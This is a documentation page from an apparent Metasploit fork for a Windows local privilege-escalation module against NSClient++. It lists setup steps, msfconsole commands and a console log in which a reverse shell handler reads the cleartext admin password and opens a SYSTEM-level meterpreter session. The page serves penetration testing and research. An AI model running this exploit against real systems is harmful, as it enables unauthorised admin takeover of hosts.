adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/local/nscp_pe.md
T
Yann Castel ebc8dba921 intial commit
2021-06-09 15:10:03 +02:00

73 lines
2.8 KiB
Markdown
Raw Blame History

## Vulnerable Application
### Description
This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.
For this module to work, both web interface of NSClient++ and `ExternalScripts` feature should be enabled.
You must also know where is the NSClient config file as it is used to read the admin password which is stored in clear text.
### Installation
A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with
this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface
and the `ExternalScripts` feature to allow the exploit to work.
## Verification Steps
List the steps needed to make sure this thing works
1. Start `msfconsole`
2. `use exploit/windows/local/nscp_pe`
3. `set SESSION <session>`
4. `set FILE <NSCP_config_file>` if the NSCP config file is not `C:\Program Files\NSClient++\nsclient.ini`
5. `check` to check if the targeted NSClient++ is vulnerable
6. `set payload <choose_a_payload>` to set a specific payload to send
7. `run` the module to exploit the vulnerability, gain admin access and start a shell
## Options
### FILE
Set the config file of NSClient++. If you don't know, try with the default value.
## Scenarios
This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted).
See the following output :
```
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
12 meterpreter x64/windows DESKTOP-T5N69RR\basic_user @ DESKTOP-T5N69RR 172.18.15.143:4444 -> 172.18.15.142:64307 (172.18.15.142)
msf6 exploit(nscp_pe) > set session 12
session => 12
msf6 exploit(nscp_pe) > run
[!] SESSION may not be compatible with this module (incompatible session type: meterpreter)
[*] Started reverse TCP handler on x.x.x.x:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[+] The target is vulnerable. External scripts feature enabled !
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: lrawsiaajn)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Sending stage (200262 bytes) to y.y.y.y
[*] Meterpreter session 13 opened (x.x.x.x:4444 -> y.y.y.y:64309) at 2021-06-09 14:37:10 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Reference in New Issue View Git Blame Copy Permalink